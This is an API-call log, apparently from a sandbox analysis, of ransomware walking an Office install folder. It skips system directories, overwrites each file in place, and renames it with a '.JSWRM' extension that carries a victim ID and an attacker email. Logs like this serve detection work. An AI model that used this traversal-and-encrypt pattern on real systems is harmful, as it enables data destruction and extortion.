HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0114.202] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4665beb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4665beb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4665beb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x77f, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="HVACDIFF.VRD", cAlternateFileName="")) returned 1 [0114.202] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2=".") returned 1 [0114.202] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2="..") returned 1 [0114.202] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2="...") returned 1 [0114.202] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2="windows") returned -1 [0114.202] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2="recovery") returned -1 [0114.202] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2="perflogs") returned -1 [0114.202] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2="documents and settings") returned 1 [0114.203] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2="$RECYCLE.BIN") returned 1 [0114.203] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2="system volume information") returned -1 [0114.203] lstrcmpiW (lpString1="HVACDIFF.VRD", lpString2="msocache") returned -1 [0114.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0114.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVACDIFF.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVACDIFF.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVACDIFF.VRD", lpUsedDefaultChar=0x0) returned 12 [0114.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0114.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0114.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVACDIFF.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVACDIFF.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVACDIFF.VRD", lpUsedDefaultChar=0x0) returned 12 [0114.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0114.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0114.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0114.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0114.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvacdiff.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.204] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1919) returned 1 [0114.204] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x770) returned 0x20c6c0 [0114.204] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x770, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x770, lpOverlapped=0x0) returned 1 [0114.210] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.210] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x770, lpOverlapped=0x0) returned 1 [0114.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0114.210] CloseHandle (hObject=0x238) returned 1 [0114.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0114.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0114.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0114.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0114.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0114.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.212] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvacdiff.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVACDIFF.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvacdiff.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0114.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0114.213] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4665beb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4665beb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4665beb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x51d, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="HVACDUCT.VRD", cAlternateFileName="")) returned 1 [0114.213] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2=".") returned 1 [0114.213] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2="..") returned 1 [0114.213] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2="...") returned 1 [0114.213] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2="windows") returned -1 [0114.213] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2="recovery") returned -1 [0114.213] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2="perflogs") returned -1 [0114.213] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2="documents and settings") returned 1 [0114.213] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2="$RECYCLE.BIN") returned 1 [0114.214] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2="system volume information") returned -1 [0114.214] lstrcmpiW (lpString1="HVACDUCT.VRD", lpString2="msocache") returned -1 [0114.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0114.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVACDUCT.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVACDUCT.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVACDUCT.VRD", lpUsedDefaultChar=0x0) returned 12 [0114.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0114.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0114.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVACDUCT.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVACDUCT.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVACDUCT.VRD", lpUsedDefaultChar=0x0) returned 12 [0114.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0114.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0114.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0114.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0114.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvacduct.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.215] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1309) returned 1 [0114.215] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x510) returned 0x230a00 [0114.215] ReadFile (in: hFile=0x238, lpBuffer=0x230a00, nNumberOfBytesToRead=0x510, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x510, lpOverlapped=0x0) returned 1 [0114.216] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.216] WriteFile (in: hFile=0x238, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x510, lpOverlapped=0x0) returned 1 [0114.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0114.216] CloseHandle (hObject=0x238) returned 1 [0114.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0114.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0114.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0114.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0114.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0114.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.217] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvacduct.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVACDUCT.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvacduct.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0114.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0114.218] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf06cb6d8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf06cb6d8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf06cb6d8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3648, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="IFDPINTL.DLL", cAlternateFileName="")) returned 1 [0114.219] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2=".") returned 1 [0114.220] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2="..") returned 1 [0114.220] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2="...") returned 1 [0114.220] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2="windows") returned -1 [0114.220] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2="recovery") returned -1 [0114.220] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2="perflogs") returned -1 [0114.220] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2="documents and settings") returned 1 [0114.220] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0114.220] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2="system volume information") returned -1 [0114.220] lstrcmpiW (lpString1="IFDPINTL.DLL", lpString2="msocache") returned -1 [0114.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0114.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IFDPINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IFDPINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IFDPINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0114.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0114.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0114.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IFDPINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IFDPINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IFDPINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0114.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0114.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0114.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0114.220] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4665beb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4665beb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4665beb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x76b, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="INSTLIST.VRD", cAlternateFileName="")) returned 1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2=".") returned 1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2="..") returned 1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2="...") returned 1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2="windows") returned -1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2="recovery") returned -1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2="perflogs") returned -1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2="documents and settings") returned 1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2="$RECYCLE.BIN") returned 1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2="system volume information") returned -1 [0114.220] lstrcmpiW (lpString1="INSTLIST.VRD", lpString2="msocache") returned -1 [0114.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INSTLIST.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INSTLIST.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INSTLIST.VRD", lpUsedDefaultChar=0x0) returned 12 [0114.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INSTLIST.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INSTLIST.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INSTLIST.VRD", lpUsedDefaultChar=0x0) returned 12 [0114.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0114.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0114.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0114.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\INSTLIST.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\instlist.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.222] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1899) returned 1 [0114.222] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x760) returned 0x20c6c0 [0114.222] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x760, lpOverlapped=0x0) returned 1 [0114.223] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.223] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x760, lpOverlapped=0x0) returned 1 [0114.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0114.224] CloseHandle (hObject=0x238) returned 1 [0114.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0114.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.224] RtlAllocateHeap 